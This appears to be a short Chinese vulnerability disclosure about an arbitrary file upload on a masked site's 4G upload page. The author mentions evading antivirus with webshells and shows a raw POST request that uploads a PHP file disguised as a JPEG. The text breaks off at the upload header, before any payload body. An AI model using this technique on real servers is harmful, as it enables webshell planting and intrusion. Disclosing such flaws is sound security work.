地址:https://**.**.**.**/res/active/4G/upload.jsp (需要登录) 上传漏洞 还装有安全软件 所以把我马子全杀了


但是 这都不是重点 重点是拿了免杀


先来个上传小马
 

POST https://**.**.**.**/AttachmentServlet?backUrl=/service/upload/img_upload.jsp HTTP/1.1 Host: **.**.**.** Connection: keep-alive Content-Length: 1912 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: https://**.**.**.** Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 QIHU 360EE Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytrI8QHebOAmXLH47 Referer: https://**.**.**.**/service/upload/img_upload.jsp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: s_fid=7BC739F3593E85F7-08481DCFE53A3A4E; lvid=1d399cc664257927153a6c35ee4ff517; nvid=1; cityCode=bj; SHOPID_COOKIEID=10001; NETJSESSIONID1=mZB6WVKBzT2FHtMzJQsQHL2XKwXnptCVV6d8TGW5Hpwmnwz0DJvt!1311323526; _pk_ref.345.1592=%5B%22%22%2C%22%22%2C1448462879%2C%22https%3A%2F%2F**.**.**.**%2Flink%3Furl%3DAdVaFcKcHEIDY_dgfI7lFNi07sx14l5wvtP6LLBt1KfJf4ocSDar9jooSmBxFHkx4XLQLPYBXj_lg5viFvr1ya%26wd%3D%26eqid%3Df78656fa000104b7000000045655c9fe%22%2C%220%22%5D; Hm_lvt_4ae12616aa0a873fc63cbdccf4a2e47a=1448462879; Hm_lpvt_4ae12616aa0a873fc63cbdccf4a2e47a=1448462910; _pk_id.345.1592=c1efc092521c47e5.1448462879.1.1448462910.1448462879.; _pk_ses.345.1592=* ------WebKitFormBoundarytrI8QHebOAmXLH47 Content-Disposition: form-data; name="uploadFile"; filename="240.php" Content-Type: image/jpeg